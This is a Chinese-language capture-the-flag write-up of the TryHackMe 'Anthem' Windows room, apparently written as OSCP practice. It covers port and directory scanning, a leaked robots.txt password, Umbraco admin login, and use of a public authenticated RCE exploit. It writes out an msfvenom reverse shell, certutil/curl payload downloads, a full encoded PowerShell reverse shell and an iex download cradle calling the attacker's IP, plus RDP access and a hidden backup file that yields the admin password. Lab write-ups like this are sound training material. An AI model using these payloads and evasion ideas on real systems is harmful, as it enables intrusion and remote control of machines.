tryhackme 记录-windows-0x0A Anthem(easy)
来源
由于最近在备考 OSCP,在套餐开始前,心里没底,想要先刷一些靶机来练手,所以在网上找到了一份类似 OSCP 靶机的清单
| Tryhackme | |||
|---|---|---|---|
| More guided and friendly approach for some rooms but still great boxes and rooms for prep. Active Directory ones here are very good practice for the OSCP. | |||
| Linux | Windows | Active Directory and Networks | Other recommended rooms |
| Mr Robot | Attacktive Directory | SQL Injection Lab | |
| Thompson | Attacking Kerberos | Linux Privilege Escalation | |
| Kenobi | Wreath Network | Windows Privilege Escalation | |
| GameZone | Reset | Git Happens | |
| Skynet | Vulnnet: Active | NahamStore | |
| Daily bugle | Enterprise | ||
| Lazy admin | Ledger | ||
| Tomghost | Weasel(官方似乎删除了,没找到) | Recommended paths | |
| Rootme | Assumed Breach Scenarios: | Cyber Security 101 | |
| CMesS | Corp | Jr Penetration Tester | |
| Ultratech | Hack Smarter Security (harder) | Lateral Movement and Pivoting | Offensive Pentesting |
| Internal | Cyberlens | Exploiting Active Directory | |
| Zeno | |||
| Boiler CTF | |||
| Wonderland | |||
| Silver Platter | |||
| Year of the Jellyfish |
由于机器数量较多,共 47 台,计划一天打 1-2 台,在一个月内打完全部机器。
0x0A Anthem(easy)
简介:
这项任务需要你关注细节,寻找“城堡的钥匙”。
这个房间专为初学者设计,但欢迎大家尝试!
享受《国歌》吧。
在这个房间里,你不需要暴力破解任何登录页面。只要用你喜欢的浏览器和远程桌面。
请给盒子最多5分钟启动和配置时间。
原文:
This task involves you, paying attention to details and finding the 'keys to the castle'.
This room is designed for beginners, however, everyone is welcomed to try it out!
Enjoy the Anthem.
In this room, you don't need to brute force any login page. Just your preferred browser and Remote Desktop.
Please give the box up to 5 minutes to boot and configure.
设置环境变量
export TARGET=10.48.139.228
信息搜集
使用 rustscan 和 nmap 进行端口扫描
rustscan -a $TARGET -r 1-65535 --ulimit 500 -- -sC -sV -T3 -Pn
Open 10.48.139.228:80
Open 10.48.139.228:3389
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 126 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
3389/tcp open ms-wbt-server syn-ack ttl 126 Microsoft Terminal Services
|_ssl-date: 2026-02-07T06:15:56+00:00; -1s from scanner time.
| rdp-ntlm-info:
| Target_Name: WIN-LU09299160F
| NetBIOS_Domain_Name: WIN-LU09299160F
| NetBIOS_Computer_Name: WIN-LU09299160F
| DNS_Domain_Name: WIN-LU09299160F
| DNS_Computer_Name: WIN-LU09299160F
| Product_Version: 10.0.17763
|_ System_Time: 2026-02-07T06:14:57+00:00
| ssl-cert: Subject: commonName=WIN-LU09299160F
| Issuer: commonName=WIN-LU09299160F
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-02-06T06:02:58
| Not valid after: 2026-08-08T06:02:58
| MD5: b50c adba 9157 e0bb 5c93 11c0 4b85 4192
| SHA-1: 80f7 7514 b6b6 087b 3659 fbf9 93d7 a06b 2788 9638
| SHA-256: 6c33 6611 e58a 44e5 7658 d490 5e84 b51b d611 3c58 0814 0803 fbcc aad9 c942 4d9d
| -----BEGIN CERTIFICATE-----
......
|_-----END CERTIFICATE-----
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
WEB 访问及目录扫描
端口扫描时共发现 2 个 web 端口:80,3389
访问 80
目录扫描使用 ffuf 工具进行扫描,字典使用 seclists 的
ffuf -u http://$TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -c
网页文件扫描
ffuf -u http://$TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt -c
Website Analysis 答题
由于这个房间问题有点多,统一放到这里来回答吧,很多意义不大的
-
What port is for the web server?
显然是 80
-
What port is for remote desktop service?
显然是 3389
-
What is a possible password in one of the pages web crawlers check for?
robots.txt 的第一行:UmbracoIsTheBest!
-
What CMS is the website using?
在 robots.txt 发现了 umbraco
-
What is the domain of the website?
直接访问 80 端口就有 Anthem.com
-
What's the name of the Administrator
第二篇文章在讲管理员,博客作者为:James Orchard Halliwell 但是不对,搜索歌词后发现 Solomon Grundy
-
Can we find find the email address of the administrator?
第一篇博客有招聘的联系方式:[email protected],但是招聘应该是 HR 的邮箱,根据邮箱命名规则和第六题的答案,可以构造管理员邮箱:[email protected]
Spot the flags 答题
-
What is flag 1?
第一篇文章的源码内
-
What is flag 2?
首页源码内
-
What is flag 3?
jane-doe 的账户页面
-
What is flag 3?
第二篇文章的源码内
初始访问
登陆后台
http://10.48.139.228/umbraco,尝试使用下面的密码本来登录
| user | pwd |
|---|---|
| [email protected] | UmbracoIsTheBest! |
| Solomon Grundy | UmbracoIsTheBest! |
| SG | UmbracoIsTheBest! |
| James Orchard Halliwell | UmbracoIsTheBest! |
| [email protected] | UmbracoIsTheBest! |
| JOH | UmbracoIsTheBest! |
| [email protected] | UmbracoIsTheBest! |
| Jane Doe | UmbracoIsTheBest! |
| JD | UmbracoIsTheBest! |
数量不多直接手工尝试了,[email protected]/UmbracoIsTheBest! 即可登录
翻了翻也没找到太多有价值的信息
exp
尝试直接找这个 cms 的 exp
searchsploit umbraco
可以看到前三个都是 RCE,但是第一个需要依赖 Metasploit,不考虑
第 2、3 个虽然是 RCE,但是标注了 Authenticated,代表需要经过认证(后台洞),但是没事,我们有后台账号密码,所以直接移动第 2、3 的 exp 到当前目录
searchsploit -m aspx/webapps/46153.py
searchsploit -m aspx/webapps/49488.py
简单查看一下 exp 代码需要我们怎么利用
-
46153.py 直接修改代码把账号密码目标地址写入即可
但是 payload 是弹计算器的,先不修改了,先放着,如果另一个脚本跑不通再来搞这个
-
49488.py 是参数式的设置还有 help,所以可以直接
python3 49488.py -u [email protected] -p UmbracoIsTheBest! -i 'http://10.48.139.228/' -c ipconfig
可以执行命令,但是-c 必须指定 exe 文件,如 cd 这种 cmd 的内置命令,不能直接放在-c,但是可以这样:
python3 49488.py -u [email protected] -p UmbracoIsTheBest! -i 'http://10.48.139.228/' -c powershell.exe -a '-NoProfile -Command pwd'
获取交互式 shell(失败)
-
msf 生成一个不通过 MSF 就能使用的马
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.196.107 LPORT=4444 -f exe -o win_re_nc_4444.exe -
python 开启 http 服务
python3 -m http.server -
penelope 开启监听
python3 penelope.py -O -
下载并执行反向 shell 马
# 失败的尝试 python3 49488.py -u [email protected] -p UmbracoIsTheBest! -i 'http://10.48.139.228/' -c 'certutil -urlcache -split -f http://192.168.196.107:8000/win_re_nc_4444.exe c:\windows\temp\win_re_nc_4444.exe' # 这里由于ipconfig的成功执行,让我以为直接将全部命令放入-c即可,但是执行却报错了,查找了以下是因为转义问题,然后又读了一下exp,原来人家-c执行命令,-a传递参数啊
# 这里继续使用certutil还是报错 python3 49488.py -u [email protected] -p UmbracoIsTheBest! -i "http://10.48.139.228/" -c cmd -a='certutil -urlcache -split -f http://192.168.196.107:8000/win_re_nc_4444.exe C:\\Windows\\Temp\\win_re_nc_4444.exe' # 使用curl没有报错 python3 49488.py -u [email protected] -p UmbracoIsTheBest! -i "http://10.48.139.228/" -c curl -a='http://192.168.196.107:8000/win_re_nc_4444.exe -O C:\\Windows\\Temp\\win_re_nc_4444.exe' # http服务器已经收到请求,但是文件似乎还是没落地,这里查了很久资料,换了各种方式还是不行,好好好,我不传了行了吧 # 直接用powershell解码 从https://www.revshells.com/生成的payload: powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADEAOQA2AC4AMQAwADcAIgAsADQANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA 改写一下 python3 49488.py -u [email protected] -p UmbracoIsTheBest! -i "http://10.48.139.228/" -c="powershell.exe" -a='-e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADEAOQA2AC4AMQAwADcAIgAsADQANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA' # 被拦截了,真有你的
不死心,在通过 ps1 脚本尝试一下,查到一个大佬写的 HTB 的一个题解,和这道题很类似
因为 Invoke-PowerShellTcp.ps1 只是一个脚本,加载后并没有操作,所以在该脚本的最后加入反弹 shell 命令(Invoke-PowerShellTcp -Reverse -IPAddress 192.168.196.107 -Port 4444),避免还需要传递参数执行
加载进内存执行,文件不落地,可能能绕过一下防护
python3 49488.py -u [email protected] -p UmbracoIsTheBest! -i "http://10.48.139.228/" -c "powershell.exe" -a "iex(new-object net.webclient).downloadstring('http://192.168.196.107:8000/re_win.ps1')"
好,投降了,事实证明不应该硬搞这里的,虽然想办法绕过防护应该也能捅进去,但这是一道 easy 难度的题,看到有别的更简单的路线
远程桌面
既然有管理员账号密码,而 3389 开着,为什么不直接尝试上号呢
xfreerdp3 /v:$TARGET /u:[email protected] /p:UmbracoIsTheBest!
不对,本来 @anthem.com 应该就是域的模式,这道简单题应该没有域,那就尝试 SG/UmbracoIsTheBest!
xfreerdp3 /v:$TARGET /u:SG /p:UmbracoIsTheBest!
行行行,这样就上来了,那我之前尝试获取交互式 shell 算什么 🤯
user.txt 就在桌面
提权
查看特权 whoami /priv,并没有特权
翻找文件,这里有点...没想到,看来 wp 后才知道,c 盘根目录下有一个备份文件夹(隐藏的)
改权限,这里感觉出题人有点为了出题而出题了,文件所有者就是我,但不让我看可还行
直接把全部权限都给了
将文件内容:ChangeMeBaby1MoreTime 作为 administrator 的密码,重新登录 rdp
xfreerdp3 /v:$TARGET /u:administrator /p:ChangeMeBaby1MoreTime
root.txt 就在桌面
总结
注意隐藏文件,执行 exp 时注意字符转义问题,尽量将命令简化,不要死磕一条路
